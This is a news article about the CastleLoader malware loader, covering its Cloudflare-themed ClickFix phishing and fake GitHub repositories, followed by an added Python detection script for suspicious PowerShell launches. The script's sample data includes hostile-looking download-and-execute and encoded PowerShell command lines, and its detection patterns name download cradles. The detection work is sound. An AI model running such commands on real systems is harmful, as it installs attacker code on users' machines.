CastleLoader Malware Compromises Over 400 Devices Through Cloudflare-Themed ClickFix Phishing Attack
CastleLoader, a sophisticated malware loader that emerged in early 2025, has successfully compromised 469 devices out of 1,634 infection attempts since May 2025, an alarming 28.7% infection rate. This versatile threat primarily targets U.S. government entities through advanced phishing campaigns that exploit user trust in legitimate platforms and services.

The malware employs two primary infection vectors to deceive victims into executing malicious code. The first method utilises ClickFix phishing techniques themed around Cloudflare services, where attackers create fraudulent domains that mimic trusted platforms such as software development libraries, Google Meet, or browser update notifications. These deceptive pages display fabricated error messages or CAPTCHA prompts, manipulating users into executing malicious PowerShell commands via the Windows Run prompt. Additionally, CastleLoader leverages fake GitHub repositories disguised as legitimate software tools, with one notable example being a repository masquerading as SQL Server Management Studio (SSMS-lib), which exploits developers’ trust in GitHub to distribute malicious installers that connect to command-and-control servers.
The technical architecture of CastleLoader showcases its sophistication through a multi-stage execution process that utilises PowerShell and AutoIT scripts. Following initial compromise, the AutoIT component loads shellcode directly into system memory as a Dynamic Link Library (DLL), subsequently resolving hashed DLL names and API calls to establish communication with one of seven distinct command-and-control servers.

The malware operators manage their infrastructure through a comprehensive web-based control panel that provides detailed victim telemetry, including unique identifiers, IP addresses, and full system information. This panel features specialised modules for payload management and precise distribution control, supporting geographic targeting capabilities and encrypted Docker containers to enhance operational security and evade detection mechanisms. CastleLoader’s versatility is further demonstrated by its ability to deploy various secondary threats, including StealC, RedLine, DeerStealer, NetSupport RAT, SectopRAT, and HijackLoader, which serve different malicious purposes such as credential harvesting and establishing persistent backdoor access.
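The ClickFix vector described above leaves a characteristic footprint: explorer.exe (the parent of anything launched from the Run prompt) spawning powershell.exe with a hidden window, an encoded command, or a download cradle. The following detection sketch, an added example that is not part of the original article, scores constructed process-creation records (field names borrowed from Sysmon Event ID 1; the sample command lines and hosts are made up) against those indicators.

```python
import re

# Constructed sample process-creation records, not real telemetry.
# Record 0 mimics a ClickFix victim pasting a cradle into Win+R; record 1 an
# encoded command; records 2 and 3 are benign lookalikes that must not fire.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr https://example.invalid/x | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoP -Ep Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe notes.txt"},
]

# (indicator name, command-line pattern, weight); weights are a tuning assumption.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("download_cradle", re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I), 3),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("bypass_policy", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 1),
]
THRESHOLD = 4  # alert when the summed weight reaches this value


def score_event(event):
    """Return (score, matched indicator names) for one record.

    Only powershell.exe launched by explorer.exe is scored, because that
    parent/child pair is what the Run-prompt ClickFix lure produces.
    """
    if not event["Image"].lower().endswith("powershell.exe"):
        return 0, []
    if not event["ParentImage"].lower().endswith("explorer.exe"):
        return 0, []
    hits = [name for name, rx, _ in INDICATORS if rx.search(event["CommandLine"])]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def find_clickfix_candidates(events, threshold=THRESHOLD):
    """Return indices of records whose indicator score reaches the threshold."""
    return [i for i, ev in enumerate(events) if score_event(ev)[0] >= threshold]
```

In a real deployment the same scoring can be applied to Windows Security Event 4688 or PowerShell script-block logs, and the RunMRU registry key of affected users corroborates that the command was typed into the Run dialog.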
Categories: Malware Loader, Phishing Attacks, Command-and-Control Infrastructure
Tags: CastleLoader, Malware, Infection Rate, Phishing Campaigns, PowerShell, Command-and-Control, Payload Delivery, GitHub Repositories, Credential Harvesting, Cyber Security